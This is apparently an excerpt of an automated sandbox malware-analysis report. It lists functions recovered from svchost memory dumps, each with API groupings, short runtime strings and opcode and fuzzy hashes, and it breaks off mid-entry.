                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: 45260b5053477a1902ed5b314b8ddb3b202787d03d162f4498fe3015baeaf19a
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: 0B012931308B4486EB64DB52A85C799A3E5FB88FD4F894035DE4A83765DF3CC98AC760
                                                                    Function 0000014E41FD36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: 27845c9942124fe15b1c72357d23f614dfff2e05e98621f38ac1f8b99baeb5ad
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 44011B75315B4482FF259B61E81C3A9A7F1BF45B96F090429CA4E87774EF3DC10A8720
                                                                    Function 0000014E41FD9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: a1bf88d4b9d8004459b5fa9669b2167566428502909aa59e78964a9a5b042688
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 8951D63270160186EF14DF75E44CBB9B7D6FB45B98F598128DA1B83BA8DB75C842C720
                                                                    Function 0000014E41FD8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 6bc827c4c3bb3e0c98ca9239eca2c50e04eb8a87f0c80140b29f13db2d6fb965
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 2631D43230074096EF14DF61E84C7A9B7E5FB44B98F098118EE5B83BA9DB39C942C724
                                                                    Function 0000014E41FD1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: b12ca8b25fa5122955bb982c68454bcc7e018bb98c49cc1ed73afc7e3ae07854
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: 30F0493270874591EF608B51F888799A7E0FB48B98F884120DA4986A64DF3CC64FC710
                                                                    Function 0000014E41FDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 035e3789f53f373a927057afabb0f361c24ef996c6f03b6afc748e9683801fc8
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: 9FF06271319B0881EF148F24E44C3A9A3A0FF89775F590319CA6A853F4CF2CC1468760
                                                                    Function 0000014E41FD3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: cc80a717613b9aef5249e127a8ce4b2df5163e301108ee4070d8aa47fa087152
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: A7F05E70308B8482EF108B12B90C1A9A3A1BF48FE4F0D4120EE4A87B28DE2CC4468720
                                                                    Function 0000014E41FD50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction ID: 742035003ab41573749cbaf50ab97c77026f2c65be4dc385caaa5c533d93989b
                                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction Fuzzy Hash: 7402B432219B8486EB60CB59E4943AAB7F0F7C5794F144116EA8E87BB8DF7CD485CB10
                                                                    Function 0000014E41FD5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction ID: 4debb5f53ed61f6123289aa0e5a7e5e44eede09a84607efc51eced9d514b7eed
                                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction Fuzzy Hash: B561A736619A84C6EB60CB15E44836AB7F0F788784F140216EA8E87BB8DB7CD456CB10
                                                                    Function 0000014E41FB3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: ead154b9435ffe6a454870689a50e6f6704023e04e4d2936ba47f9ea0b1d783b
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 0711A0B2BD0E1351FEA41569E75E3E993C07FD8374F4C8628A966862F7CA28C8474230
                                                                    Function 0000014E41FE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: e72965eb51f99d8a0ac95fcd431345854843bb65debfdf1bdb0de3510e35bf29
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 6E118F32B58B5011FF665568D45D3E593C17FA83A8E0F062CA976C67F68A2CC9438224
                                                                    Function 0000014E41FAF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: 9afa7e71d04fa23ee4952312235bac51a1d74b63e64a95d112a04740b73905c4
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 45614C7670064042FE659B65E58C3EEEBE1BF867C0F5D4515DA0A9BFB4EA3CD8438220
                                                                    Function 0000014E41FDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 0789a3831c1f6d771d65473aec04d891a6e65c0c978cd43e319f5209d2f070c5
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: F7614833705B848AEB209F65D4443EDB7E0FB84B98F084215EE4A57BA8DB38D596C714
                                                                    Function 0000014E41FAA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 9fc2ac829e4d419cfb4e4e7491d5e77e61521fb2b31f7c138b84e684f10f9101
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: E0516E32200380CAEF648B659548398B7E0FB55BD4F1C4116DA9DC7FA5CB7ED466CB20
                                                                    Function 0000014E41FDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 321aa2bf97eac6cafb4f774fd1c13e020d27b9bfb404d6bee772e39a7e361af9
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 54516E722003808AEF648F26D5883A9B7E0FB94B95F1C4255DA9E87BE5CB38D453C718
                                                                    Function 0000014E41FA8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 0bce45575947cd2407113779943a525e14445a621b98b0471fe801dac2351894
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: C951B4327412008EDF54CB15D40CB98B7E5FB94BE9F9C8124DE8683B6CE7B8D8428724
                                                                    Function 0000014E41FA83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: c159a0ba046949333dfa247496e2d25aa9719a0157f25d5229989bbc026eab31
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: A2319E313416409AEB14DF11E848799B7E4FB44BD9F9D8018EE9B83BA8DB7CD942C724
                                                                    Function 0000014E41FE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: afeff5cfcaf4403b8b152d041e9c12e6ce2064c04c3d4c674498ddf2345b7502
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: 44D1D072718B8089EB11CFA9D4443ECBBF1FB54798F194216CE5A97BAAEA34C507C350
                                                                    Function 0000014E41FE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: cea13cf84bf215eda1d4e32a4ca8aa5317b936fd82c1a643056d64915862160e
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: 2091B372708B5485FF60DFA994883EDABE0BB44B98F1D4109DE0A977A5EB74C483C720
                                                                    Function 0000014E41FD7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: dfc3c1974cbad934db9993865ec08b5f9e443c71fc6a37ba405ddabd85e8d405
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 65113032714F4589EF00CF60E8583E873B4FB59B68F480E25DA6D867A4DF78C1998390
                                                                    Function 0000014E41FD253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: a326b1bb8bb403e4a0d4c0446bf3a53fe52e6195dedbf9b24ed740f8b36a4abd
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: B171C236304B8185EF359E65D8483FAA7D4FB85784F4A0126DE0B83BA9DF35C6468750
                                                                    Function 0000014E41FA9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 9082f48436bddb50fbe074ea12ed5132107a6f235155bfae31550afec4f2ce97
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: ED613736A00B848AEB20DFA5D4843DDB7A0FB44BC8F184215EF4957FA9DB78D596C720
                                                                    Function 0000014E41FD2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: cc360d09ba06bcdff2f15c29ced7a4e175476a6bb9ba5d9fe31b0890df6299d6
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: 7851E73230478181FF259A69A55C3FAE7E1FBC6750F8D0125DE4B83B6ECA39C50687A0
                                                                    Function 0000014E41FE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: c83ac0f76dcb79476ddf21a95a19c8a865843251dc56904ff8b0029dd694ac40
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: E941A232318B8082DF20CF65E8483E9A7A0FB98794F494022EE4EC77A4EB7CC542C750
                                                                    Function 0000014E41FD94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 558f2c2fa83ee08c27e1fc5abc980bded73aea70065ff57803d74eae209385c4
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: 0F112832218B8482EF618B15F448399B7E5FB88B94F5D8220EE8D47B69DF3DC552CB00
                                                                    Function 0000014E41FA7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: eb669838bcd11bd9391b268dc568cb615196d67751b03d9664e942e19c7f9c9a
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: F0E08671740B4490DF018F21E8442D873E0EF59B64B8C9122D95C46331FA3CD1FAC310
                                                                    Function 0000014E41FA73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: dcf211704ab779cfcff42d5391f5e7064cd144a077eba1243619bea389c199af
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 92E08671740B4480EF028F21D4401D8B3A0FB59B54B8C9122C94C46331EA3CD1E6C310
                                                                    Function 0000014E41FD1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
